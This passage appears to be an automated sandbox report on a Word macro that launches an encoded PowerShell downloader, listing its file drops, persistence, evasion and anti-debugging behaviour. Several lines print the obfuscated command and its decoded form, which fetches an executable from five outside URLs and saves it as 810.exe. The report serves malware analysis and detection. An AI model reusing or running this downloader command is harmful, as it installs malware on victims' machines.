Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ			Jump to behavior

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_00401A36 LoadLibraryA,GetProcAddress,

6_2_00401A36

PE file contains sections with non-standard names

Show sources

Source: 810.exe.4.dr

Static PE information: section name: .v0

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\810.exe	Code function: 6_2_003E57E6 push C2680041h; ret	6_2_003E5BC8
Source: C:\Users\user\810.exe	Code function: 6_2_003E57DB push C2680041h; ret	6_2_003E5BC8
Source: C:\Users\user\810.exe	Code function: 6_2_0040BB02 push edi; retf	6_2_0040BB05
Source: C:\Users\user\810.exe	Code function: 7_2_000F57DB push C2680041h; ret	7_2_000F5BC8
Source: C:\Users\user\810.exe	Code function: 7_2_000F57E6 push C2680041h; ret	7_2_000F5BC8
Source: C:\Users\user\810.exe	Code function: 7_2_0011BB02 push edi; retf	7_2_0011BB05
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002857E6 push C2680041h; ret	8_2_00285BC8
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002857DB push C2680041h; ret	8_2_00285BC8
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002ABB02 push edi; retf	8_2_002ABB05
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_000F57DB push C2680041h; ret	9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_000F57E6 push C2680041h; ret	9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_0011BB02 push edi; retf	9_2_0011BB05

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\startedradar.exe

Executable created and started: C:\Windows\System32\startedradar.exe

Jump to behavior

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\810.exe

Jump to dropped file

Drops PE files to the user directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\810.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Users\user\810.exe

PE file moved: C:\Windows\System32\startedradar.exe

Jump to behavior

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\810.exe

Jump to dropped file

Contains functionality to start windows services

Show sources

Source: C:\Users\user\810.exe

Code function: 7_2_0011FE73 StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_0011FE73

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\810.exe

File opened: C:\Windows\system32\startedradar.exe:Zone.Identifier read attributes | delete

Jump to behavior

Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Checks the free space of harddrives

Show sources

Source: C:\Users\user\810.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Contains functionality to enumerate running services

Show sources

Source: C:\Users\user\810.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,	7_2_0011FA77
Source: C:\Users\user\810.exe	Code function: EnumServicesStatusExW,GetLastError,	7_2_0011FA14
Source: C:\Windows\System32\startedradar.exe	Code function: EnumServicesStatusExW,GetLastError,	9_2_0011FA14
Source: C:\Windows\System32\startedradar.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,	9_2_0011FA77

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\810.exe	API coverage: 7.9 %
Source: C:\Windows\System32\startedradar.exe	API coverage: 3.9 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\810.exe TID: 3804	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\startedradar.exe TID: 2516	Thread sleep time: -60000s >= -30000s	Jump to behavior

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_00401A36 LoadLibraryA,GetProcAddress,

6_2_00401A36

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\810.exe	Code function: 6_2_00401550 mov eax, dword ptr fs:[00000030h]	6_2_00401550
Source: C:\Users\user\810.exe	Code function: 7_2_00111550 mov eax, dword ptr fs:[00000030h]	7_2_00111550
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002A1550 mov eax, dword ptr fs:[00000030h]	8_2_002A1550
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00111550 mov eax, dword ptr fs:[00000030h]	9_2_00111550

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_003E2513 GetProcessHeap,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,

6_2_003E2513

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'	Jump to behavior
Source: C:\Users\user\810.exe	Process created: C:\Users\user\810.exe C:\Users\user\810.exe	Jump to behavior
Source: C:\Windows\System32\startedradar.exe	Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYA